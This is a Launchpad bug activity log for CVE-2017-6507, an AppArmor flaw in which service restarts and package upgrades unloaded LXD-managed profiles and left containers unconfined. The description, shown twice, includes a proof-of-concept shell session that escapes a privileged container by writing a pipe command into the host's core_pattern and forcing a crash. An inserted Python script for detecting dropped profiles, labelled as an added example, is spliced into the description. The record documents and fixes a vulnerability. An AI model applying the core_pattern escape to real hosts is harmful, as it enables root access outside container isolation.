Date | Who | What changed | Old value | New value | Message |
2017-03-01 08:39:05 | Stéphane Graber | bug | | | added bug |
2017-03-01 08:41:10 | Stéphane Graber | bug | | | added subscriber Ubuntu Container Security team |
2017-03-03 23:21:24 | Tyler Hicks | apparmor (Ubuntu): status | New | In Progress | |
2017-03-03 23:21:30 | Tyler Hicks | apparmor (Ubuntu): assignee | | Tyler Hicks (tyhicks) | |
2017-03-08 00:43:07 | Tyler Hicks | cve linked | | 2017-6507 | |
2017-03-11 00:13:31 | Tyler Hicks | bug task added | | apparmor | |
2017-03-11 00:13:39 | Tyler Hicks | apparmor: status | New | In Progress | |
2017-03-11 00:13:42 | Tyler Hicks | apparmor: importance | Undecided | Critical | |
2017-03-11 00:13:44 | Tyler Hicks | apparmor: assignee | | Tyler Hicks (tyhicks) | |
2017-03-11 00:15:11 | Tyler Hicks | attachment added | | 0001-parser-Preserve-unknown-profiles-when-restarting-app.patch https://bugs.launchpad.net/apparmor/+bug/1668892/+attachment/4835672/+files/0001-parser-Preserve-unknown-profiles-when-restarting-app.patch | |
2017-03-11 00:16:43 | Tyler Hicks | attachment added | | 0002-utils-Add-aa-remove-unknown-utility-to-unload-unknow.patch https://bugs.launchpad.net/apparmor/+bug/1668892/+attachment/4835673/+files/0002-utils-Add-aa-remove-unknown-utility-to-unload-unknow.patch | |
2017-03-11 00:16:52 | Tyler Hicks | bug | | | added subscriber Tyler Hicks |
2017-03-16 16:10:27 | Christian Brauner | bug | | | added subscriber Christian Brauner |
2017-03-16 16:15:41 | Christian Brauner | bug | | | added subscriber Jon Grimm |
2017-03-17 13:12:47 | Tyler Hicks | bug | | | added subscriber intrigeri |
2017-03-23 22:48:59 | Tyler Hicks | summary | apparmor package upgrades unload all LXD profiles | apparmor package upgrades unload privately managed profiles | |
2017-03-23 22:49:22 | Tyler Hicks | summary | apparmor package upgrades unload privately managed profiles | CVE-2017-6507: apparmor package upgrades unload privately managed profiles | |
2017-03-23 22:55:27 | Tyler Hicks | description | (old value and new value follow) |
=== Old value ===
Apparmor package upgrades unload all LXD apparmor profiles, making all LXD containers unconfined.
Example:
# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2
# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)
# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...
# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined
# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$
# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned
This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981 |
=== New value ===
Restarting the apparmor init script, upstart job, or systemd service has historically removed every loaded profile that is not defined in the well-known profile locations. In upstream AppArmor terms, that location is /etc/apparmor.d/, but Ubuntu also adds additional locations.
This behavior has previously caused a problem where libvirt-managed profiles would be unloaded upon "restarting AppArmor":
https://launchpad.net/bugs/702774
Stéphane Graber created this bug report after he noticed that the same behavior was causing similar problems with LXD-managed profiles.
In addition, AppArmor distro packaging may trigger an "AppArmor restart" when installing a new version of AppArmor, resulting in the same profile removal problem. This is true for the Debian/Ubuntu packaging.
The upstream AppArmor team has decided to remove this functionality from the AppArmor restart logic to prevent a similar issue from happening with the next external project that needs to privately manage its own set of AppArmor profiles.
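The check an operator would want after reading the paragraphs above is whether a restart or upgrade silently dropped profiles that no packaged policy file defines, and whether a given task is still confined. The following is an added example for this bug log, not code from the report, from LXD or from the AppArmor project (it does not reproduce the aa-remove-unknown utility attached to the bug). It assumes the kernel's loaded-profile listing in /sys/kernel/security/apparmor/profiles uses one "<name> (<mode>)" line per profile, that stacked task labels from /proc/<pid>/attr/current join their components with "//&", and that the "known" set was collected by the operator from the packaged profile directories (for instance with apparmor_parser -N over /etc/apparmor.d). The listings and profile names in the block are constructed samples; the LXD label strings are the ones shown in the report.

```python
"""Detect privately managed AppArmor profiles that vanished across a restart.

Added example; not from the bug report, LXD or the AppArmor project.
Assumed formats are marked below; sample listings are constructed.
"""
import re
from typing import Dict, Iterable, Set

# Assumed format of /sys/kernel/security/apparmor/profiles: "<name> (<mode>)".
_PROFILE_LINE = re.compile(r"^(?P<name>.+?) \((?P<mode>\w+)\)$")
# Assumed separator between components of a stacked task label; the first
# component is the profile confining the task in the outer (host) namespace.
_STACK_SEP = "//&"


def parse_loaded_profiles(listing: str) -> Dict[str, str]:
    """Map profile name -> mode from a loaded-profile listing."""
    profiles: Dict[str, str] = {}
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        match = _PROFILE_LINE.match(line)
        if match is None:
            raise ValueError(f"unrecognised profile line: {line!r}")
        profiles[match.group("name")] = match.group("mode")
    return profiles


def outer_profile(label: str) -> str:
    """Outer profile name of a /proc/<pid>/attr/current label, mode stripped."""
    label = re.sub(r" \(\w+\)$", "", label.strip())
    return label.split(_STACK_SEP, 1)[0]


def task_is_confined(label: str) -> bool:
    """False when the outer profile is 'unconfined' (the post-upgrade state)."""
    return outer_profile(label) != "unconfined"


def audit_restart(before: str, after: str, known: Iterable[str]) -> Dict[str, Set[str]]:
    """Compare listings taken before and after an AppArmor restart/upgrade.

    'private_before' are loaded profiles that no packaged policy defines
    (LXD's per-container profiles in the report are the motivating case);
    'dropped_private' is the subset that disappeared, i.e. the symptom the
    bug describes; 'missing_known' flags packaged policy that did not reload.
    """
    loaded_before = set(parse_loaded_profiles(before))
    loaded_after = set(parse_loaded_profiles(after))
    known_set = set(known)
    private_before = loaded_before - known_set
    return {
        "private_before": private_before,
        "dropped_private": private_before - loaded_after,
        "surviving_private": private_before & loaded_after,
        "missing_known": (loaded_before & known_set) - loaded_after,
    }


# Constructed sample listings (not captured from a real host).
SAMPLE_BEFORE = """\
/sbin/dhclient (enforce)
/usr/bin/lxc-start (enforce)
lxd-c1_</var/lib/lxd> (enforce)
lxd-c2_</var/lib/lxd> (enforce)
"""
SAMPLE_AFTER = """\
/sbin/dhclient (enforce)
/usr/bin/lxc-start (enforce)
"""
# Constructed: names the operator collected from the packaged policy files.
SAMPLE_KNOWN = {"/sbin/dhclient", "/usr/bin/lxc-start"}


if __name__ == "__main__":
    result = audit_restart(SAMPLE_BEFORE, SAMPLE_AFTER, SAMPLE_KNOWN)
    for key, names in sorted(result.items()):
        print(f"{key}: {sorted(names)}")
    # Task labels as shown in the report, before and after the upgrade.
    for label in (
        "lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)",
        "unconfined//&:lxd-c2_<var-lib-lxd>://unconfined",
    ):
        state = "confined  " if task_is_confined(label) else "UNCONFINED"
        print(f"{state} {label}")
```

On a live host, capture the listing before and after the restart, feed both to audit_restart together with the known set, and treat a non-empty dropped_private as the condition the bug describes; task_is_confined gives the per-process view the report obtained by reading /proc/<pid>/attr/current.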
=== Original Bug Report ===
Apparmor package upgrades unload all LXD apparmor profiles, making all LXD containers unconfined.
Example:
# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2
# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)
# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...
# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined
# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$
# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned
This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981 |
|
2017-03-23 22:57:01 | Tyler Hicks | information type | Private Security | Public Security | |
2017-03-23 23:03:31 | Tyler Hicks | summary | CVE-2017-6507: apparmor package upgrades unload privately managed profiles | CVE-2017-6507: apparmor service restarts and package upgrades unload privately managed profiles | |
2017-03-24 00:26:47 | Ubuntu Foundations Team Bug Bot | tags | | patch | |
2017-03-24 05:09:19 | Launchpad Janitor | branch linked | | lp:apparmor | |
2017-03-24 05:12:01 | Tyler Hicks | apparmor: status | In Progress | Fix Committed | |
2017-03-24 05:12:11 | Tyler Hicks | apparmor: milestone | | 2.12 | |
2017-03-24 06:16:41 | Launchpad Janitor | branch linked | | lp:~apparmor-dev/apparmor/apparmor-ubuntu-citrain | |
2017-03-24 09:35:18 | Launchpad Janitor | apparmor (Ubuntu): status | In Progress | Fix Released | |
2017-03-24 17:44:17 | Launchpad Janitor | branch linked | | lp:apparmor/2.10 | |
2017-03-24 17:46:32 | Launchpad Janitor | branch linked | | lp:apparmor/2.9 | |
2017-03-24 18:01:30 | Christian Boltz | nominated for series | | apparmor/2.10 | |
2017-03-24 18:01:30 | Christian Boltz | bug task added | | apparmor/2.10 | |
2017-03-24 18:01:30 | Christian Boltz | nominated for series | | apparmor/2.11 | |
2017-03-24 18:01:30 | Christian Boltz | bug task added | | apparmor/2.11 | |
2017-03-24 18:01:45 | Christian Boltz | apparmor/2.10: milestone | | 2.11.1 | |
2017-03-24 18:01:49 | Christian Boltz | apparmor/2.10: status | New | Fix Committed | |
2017-03-24 18:01:52 | Christian Boltz | apparmor/2.11: status | New | Fix Committed | |
2017-03-24 18:01:59 | Christian Boltz | apparmor/2.11: milestone | | 2.11.1 | |
2017-03-24 18:02:07 | Christian Boltz | apparmor/2.10: milestone | 2.11.1 | 2.10.3 | |
2017-03-24 18:02:23 | Christian Boltz | nominated for series | | apparmor/2.9 | |
2017-03-24 18:02:23 | Christian Boltz | bug task added | | apparmor/2.9 | |
2017-03-24 18:02:30 | Christian Boltz | apparmor/2.9: milestone | | 2.9.5 | |
2017-03-24 18:02:34 | Christian Boltz | apparmor/2.9: status | New | Fix Committed | |
2017-03-28 23:08:15 | paz | bug | | | added subscriber paz |
2017-10-19 09:34:24 | John Johansen | apparmor: status | Fix Committed | Won't Fix | |
2017-10-19 09:34:30 | John Johansen | apparmor: status | Won't Fix | Fix Committed | |
2017-10-19 09:34:35 | John Johansen | apparmor/2.10: status | Fix Committed | Fix Released | |
2017-10-19 09:34:40 | John Johansen | apparmor/2.11: status | Fix Committed | Fix Released | |
2017-10-19 09:34:45 | John Johansen | apparmor/2.9: status | Fix Committed | Fix Released | |
2018-04-22 11:27:01 | Christian Boltz | apparmor: status | Fix Committed | Fix Released | |
2019-11-08 16:01:54 | juan serven | apparmor: assignee | Tyler Hicks (tyhicks) | juan serven (juanserven) | |